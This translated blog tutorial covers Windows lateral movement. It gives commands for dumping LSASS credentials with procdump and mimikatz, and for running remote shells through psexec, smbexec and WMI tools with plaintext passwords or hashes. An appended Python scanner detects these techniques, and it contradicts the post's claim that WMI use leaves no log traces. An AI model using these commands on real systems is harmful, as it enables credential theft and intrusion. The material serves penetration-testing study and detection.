Intranet security: lateral movement attacks (SMB || WMI plaintext or hash passing)

Intranet Security: Lateral Movement Attacks

Lateral movement means compromising one of the target's hosts, using that captured host as a springboard to penetrate other hosts on the intranet, and using the resources already gained to try to obtain more credentials and higher privileges. Hosts are taken over step by step until the whole intranet is controlled, the highest privileges are obtained, and an advanced persistent threat can be mounted. (Credential-passing attacks are based mainly on obtaining plaintext passwords or hash values.)


Table of contents:

Intranet Security: Lateral Movement Attacks

Procdump + Mimikatz: obtaining the target host's password

SMB service usage (psexec || smbexec)

psexec usage:

smbexec usage:

WMI service usage (wmic || cscript || wmiexec)

(1) Built-in WMIC: plaintext passing, no command output (no echo)

(2) Built-in cscript: plaintext passing with output (echo) [requires downloading the wmiexec.vbs tool]

(3) impacket suite: wmiexec with plaintext or hash passing, with output (exe version)


Procdump + Mimikatz: obtaining the target host's password

Download procdump: https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

Download Mimikatz: https://github.com/gentilkiwi/mimikatz/releases
Find a way to upload procdump to the target host.
Then run this command to generate an lsass.dmp file (then download it to our own host for analysis):

procdump -accepteula -ma lsass.exe lsass.dmp

Run in mimikatz:

(1) privilege::debug

(2) sekurlsa::minidump lsass.dmp

(3) sekurlsa::logonPasswords full


SMB service usage (psexec || smbexec)

The SMB service can be used for remote execution via plaintext or hash passing; the condition is that service port 445 is open.

Tool download: https://learn.microsoft.com/zh-cn/sysinternals/downloads/pstools

psexec usage:

(1) Psexec, first form: an IPC connection is established first; psexec requires plaintext or hash passing.
net use \\192.168.0.101\ipc$ "admin" /user:Administrator        // IPC connection

net use \\<target host IP>\ipc$ "<target password>" /user:<target account>
psexec \\192.168.0.101 -s cmd        // -s runs with SYSTEM privileges

psexec \\<target host IP> -s cmd


(2) Psexec, second form: supply the plaintext account and password directly, without establishing IPC. [Recommended]
psexec \\192.168.0.101 -u administrator -p admin -s cmd    // connect with plaintext credentials

psexec \\<target host IP> -u <account> -p <password> -s cmd

Hash passing (the ciphertext is the hash collected earlier):

impacket tool download: https://gitee.com/RichChigga/impacket-examples-windows/repository/archive/master.zip

Running this directly with the psexec above does not work, so the impacket tool is needed.

psexec -hashes :<hash value> ./<account>@<target IP>        (workgroup)
psexec -hashes :<hash value> <domain>/<account>@<target IP>        (domain)

psexec -hashes :209c6174da490caeb422f3fa5a7ae634 ./[email protected]


smbexec usage:

smbexec does not need an IPC connection first; it supports plaintext or hash passing. [uses the impacket tool]
(1) smbexec god/administrator:[email protected]    (domain connection)

    # smbexec <domain>/<account>:<password>@<target IP>

(2) smbexec ./administrator:[email protected]     (workgroup connection)

    # smbexec ./<account>:<password>@<target IP>

(3) smbexec -hashes :209c6174da490caeb422f3fa5a7ae634 ./[email protected]

    # smbexec -hashes :<hash> ./<account>@<target IP>

(4) smbexec -hashes :209c6174da490caeb422f3fa5a7ae634 god/[email protected]

    # smbexec -hashes :<hash> <domain>/<account>@<target IP>


WMI service usage (wmic || cscript || wmiexec)

The WMI service is used through port 135. It supports authentication with a plaintext username and password or with a hash, and this method does not leave traces in the target's log system.

(1) Built-in WMIC: plaintext passing, no command output (no echo).

wmic /node:192.168.0.101 /user:administrator /password:admin process call create "cmd.exe /c ipconfig >C:\1.txt"


(2) Built-in cscript: plaintext passing with output (echo). [Requires downloading the wmiexec.vbs tool]

cscript //nologo wmiexec.vbs /shell 192.168.0.101 administrator admin

cscript //nologo wmiexec.vbs /shell <target IP> <account> <password>


(3) impacket suite: wmiexec with plaintext or hash passing, with output (exe version)

wmiexec ./administrator:[email protected] "whoami"        [plaintext connection]

wmiexec -hashes :209c6174da490caeb422f3fa5a7ae634 ./[email protected] "whoami"        [hash connection]

wmiexec ./<account>:<password>@<target host IP> "<command whose output you want>"    [workgroup]

wmiexec <domain>/<account>:<password>@<target host IP> "<command whose output you want>"    [domain]
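As an added defender-side example (not part of the original post), a small Python scanner that runs the detection logic for the techniques above over constructed sample event lines: PsExec-style service installs (System event 7045), smbexec-style services whose binary is just a shell, processes spawned under WmiPrvSE.exe (Security event 4688, which is where wmic/wmiexec "process call create" does show up on the target), LSASS dumps via procdump, and NTLM network logons as correlation context. The key=value log rendering and every field value are constructed for this example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample events (not real logs): a simplified key=value rendering of
# Windows Security (4624, 4688) and System (7045) records, one event per line.
SAMPLE_EVENTS = r"""
EventID=4624 LogonType=3 AuthPackage=NTLM Account=administrator IpAddress=192.168.0.101
EventID=7045 ServiceName=PSEXESVC ImagePath="%SystemRoot%\PSEXESVC.exe"
EventID=7045 ServiceName=BTOBTO ImagePath="%COMSPEC% /Q /c C:\Windows\TEMP\execute.bat"
EventID=4688 NewProcess="C:\Windows\System32\cmd.exe" ParentProcess="C:\Windows\System32\wbem\WmiPrvSE.exe"
EventID=4688 NewProcess="C:\tools\procdump.exe" CommandLine="procdump -accepteula -ma lsass.exe lsass.dmp"
EventID=4688 NewProcess="C:\Windows\System32\notepad.exe" ParentProcess="C:\Windows\explorer.exe"
"""

# key=value pairs; quoted values may contain spaces (command lines, image paths).
FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> Dict[str, str]:
    """Parse one key=value event line into a field dictionary."""
    return {key: quoted or bare for key, quoted, bare in FIELD.findall(line)}


def classify(event: Dict[str, str]) -> Optional[str]:
    """Map one parsed event to a lateral-movement indicator, or None if nothing matches."""
    eid = event.get("EventID")
    if eid == "7045":  # service installed: how psexec/smbexec run commands on the target
        image = event.get("ImagePath", "").lower()
        if "psexesvc" in image or event.get("ServiceName", "").upper() == "PSEXESVC":
            return "psexec-service-install"
        if "%comspec%" in image or "cmd.exe" in image:  # service binary is just a shell
            return "shell-wrapping-service-install"
    elif eid == "4688":  # process creation
        parent = event.get("ParentProcess", "").lower()
        cmdline = event.get("CommandLine", "").lower()
        if parent.endswith("wmiprvse.exe"):  # wmic / wmiexec "process call create" lands here
            return "wmi-spawned-process"
        if "lsass" in cmdline and ("procdump" in cmdline or " -ma " in cmdline):
            return "lsass-memory-dump"
    elif eid == "4624" and event.get("LogonType") == "3" and event.get("AuthPackage") == "NTLM":
        return "ntlm-network-logon"  # context only: plaintext and pass-the-hash logons look alike here
    return None


def scan(text: str) -> List[Tuple[str, Dict[str, str]]]:
    """Run classify() over every event line; return (indicator, event) hits in order."""
    events = [parse_event(line) for line in text.strip().splitlines()]
    return [(classify(ev), ev) for ev in events if classify(ev)]
```

Running scan(SAMPLE_EVENTS) flags five of the six constructed lines and leaves the notepad.exe launch alone; in practice the NTLM logon is only useful when correlated with a service install or WMI child process from the same source.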


Learning link: Day 67: Intranet security - domain lateral movement, SMB & WMI plaintext or hash passing (bilibili)


Origin blog.csdn.net/weixin_54977781/article/details/131111835